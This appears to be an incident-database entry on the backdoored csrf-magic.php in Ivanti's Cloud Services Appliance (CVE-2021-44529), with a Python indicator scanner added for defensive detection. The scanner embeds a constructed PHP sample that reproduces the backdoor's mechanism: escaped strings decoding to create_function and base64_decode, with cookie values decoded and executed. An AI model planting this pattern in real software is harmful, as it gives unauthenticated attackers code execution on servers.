Proprietary · 2014-02-01 · 2861 days · Backdoor, Remote Code Execution

Ivanti CSA shipped csrf-magic backdoor

Ivanti EPM Cloud Services Appliance carried a backdoored csrf-magic.php file that enabled unauthenticated PHP code execution. The poisoned code appears to have come from a counterfeit csrf-magic clone, not the official project.

Story

CVE-2021-44529 looked like a code injection bug in Ivanti EPM Cloud Services Appliance. The patch told administrators to remove a block in /opt/landesk/broker/webroot/lib/csrf-magic.php beginning with // Obscure Tokens. That was the tell. The vulnerable code was not a normal parser mistake. It was a backdoor.

The injected PHP was small and blunt. It decoded obfuscated string literals into the function names str_replace, base64_decode, and create_function, then reached a path that evaluated attacker-supplied PHP. A request carrying cookies of the right shape caused the code to concatenate the cookie values, base64-decode them, and execute the result. The response marker was the string c123.
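A small indicator check for the mechanism described above and for the marker the advisory tells administrators to look for, added here as an example (it is neither Ivanti's code nor the csrf-magic project's). It flags the "// Obscure Tokens" comment, decodes PHP double-quoted literals written as hex or octal escapes and reports any that resolve to create_function, base64_decode, str_replace, eval or assert, and notes whether $_COOKIE appears alongside such a primitive. The PHP snippets embedded in it are constructed stand-ins for the demo, not the real backdoor, and the escape decoding and the name set are my own assumptions about what such a scan should cover.

```python
"""Indicator scanner for a copy of csrf-magic.php (added example).

Not Ivanti's code and not the csrf-magic project's code. It looks for the
traits the advisory and public write-ups describe: the "// Obscure Tokens"
comment marking the injected block, double-quoted PHP literals built from
hex or octal escapes that decode to dangerous function names, and $_COOKIE
used next to such a primitive. The PHP samples below are constructed for the
demo; they are not the real backdoor.
"""
import re
import sys
from typing import Dict, List, Tuple

MARKER = "// Obscure Tokens"
# Assumed set of names worth flagging when they only appear in escaped form.
SUSPECT_NAMES = {"create_function", "base64_decode", "str_replace", "eval", "assert"}

# A PHP double-quoted literal; the body may hold \xHH, \NNN, other escapes
# such as \" or plain characters.
LITERAL_RE = re.compile(r'"((?:\\x[0-9A-Fa-f]{2}|\\[0-7]{1,3}|\\.|[^"\\])*)"')
# Only the escapes that hide text: \xHH (group 1) and \NNN octal (group 2).
ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\([0-7]{1,3})")


def decode_php_escapes(body: str) -> str:
    """Resolve hex and octal escapes the way PHP does in double-quoted strings."""
    def repl(m) -> str:
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8))
    return ESCAPE_RE.sub(repl, body)


def find_hidden_names(src: str) -> List[Tuple[str, str]]:
    """Return (literal body, decoded name) for escaped literals that decode to a suspect name."""
    hits: List[Tuple[str, str]] = []
    for m in LITERAL_RE.finditer(src):
        body = m.group(1)
        if not ESCAPE_RE.search(body):
            continue  # no hex/octal escapes, so nothing is being hidden
        decoded = decode_php_escapes(body)
        if decoded in SUSPECT_NAMES:
            hits.append((body, decoded))
    return hits


def scan(src: str) -> Dict[str, object]:
    """Summarise the backdoor indicators present in one PHP source text."""
    lines = src.splitlines()
    marker_lines = [i + 1 for i, line in enumerate(lines) if MARKER in line]
    hidden = find_hidden_names(src)
    plain_exec = re.search(r"\b(?:create_function|eval)\s*\(", src) is not None
    has_exec_primitive = bool(hidden) or plain_exec
    return {
        "marker_lines": marker_lines,
        "hidden_names": hidden,
        "cookie_exec": "$_COOKIE" in src and has_exec_primitive,
        "suspicious": bool(marker_lines or hidden),
    }


# Constructed PHP excerpt mimicking the described pattern: escaped literals
# resolving to str_replace / base64_decode / create_function, cookie values
# concatenated, base64-decoded and executed. Not the real Ivanti file.
SUSPECT_SAMPLE = r'''<?php
// constructed stand-in for a poisoned csrf-magic.php
function csrf_check_token($t) { return hash_equals($_COOKIE['csrf'] ?? '', $t); }

// Obscure Tokens
$a = "\x73\x74\x72\x5f\x72\x65\x70\x6c\x61\x63\x65";
$b = "\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";
$c = "\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";
$f = $c("", $b(implode("", $_COOKIE)));
$f();
'''

# Constructed clean excerpt: ordinary csrf-magic-style code, escapes only for quotes.
CLEAN_SAMPLE = r'''<?php
function csrf_check_token($t) { return hash_equals($_COOKIE['csrf'] ?? '', $t); }
echo "<input type=\"hidden\" name=\"csrf\" value=\"" . csrf_get_token() . "\" />";
'''

if __name__ == "__main__":
    # Usage: python scan_csrf_magic.py /opt/landesk/broker/webroot/lib/csrf-magic.php
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            source = fh.read()
    else:
        source = SUSPECT_SAMPLE
    print(scan(source))
```

The marker check alone is what the advisory asks for; the escape decoding catches a re-obfuscated copy of the same block that no longer carries the comment, which is the case a responder actually has to worry about when the file has been touched since the patch.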

Sonatype traced the likely origin to a counterfeit GitHub repository named like the csrf-magic project. The official csrf-magic source lived elsewhere, and the suspicious commit, f7f84f887a5f2e19926a2ad3c48614905629d60b, was not found in the official repo or its mirrors. The best public explanation is simple: a cloned project was poisoned and later consumed by Ivanti.

The record is therefore modeled as a proprietary distribution incident. The open-source project itself was not shown to be compromised. Ivanti's official appliance distributed the backdoored file, and the 4.6.0-512 patch removed it. CISA later added CVE-2021-44529 to its Known Exploited Vulnerabilities catalog.

Affected Artifacts

Observed
2014-02-01 to 2021-12-02
Compromised Versions
Unknown
Fixed
4.6.0-512
Evidence
mirror: forums.ivanti.com/s/article/SA-2021-12-02, cve: CVE-2021-44529, path: /opt/landesk/broker/webroot/lib/csrf-magic.php, file: csrf-magic.php, +4 more
  • Public sources do not establish when Ivanti first imported the poisoned component; the start date tracks the reported counterfeit repository commit date.
  • The issue affected CSA versions before 4.6.0-512; public advisories describe 4.6 and earlier versions rather than a clean enumerated version list.
  • This is not modeled as an OSS project compromise because the official csrf-magic project was not shown to be hijacked.

Incident Context

Motive
Remote Access
Cause
Poisoned Third Party Component
Transitive
Yes

External References

Source record: proprietary/ivanti-csa/meta.yaml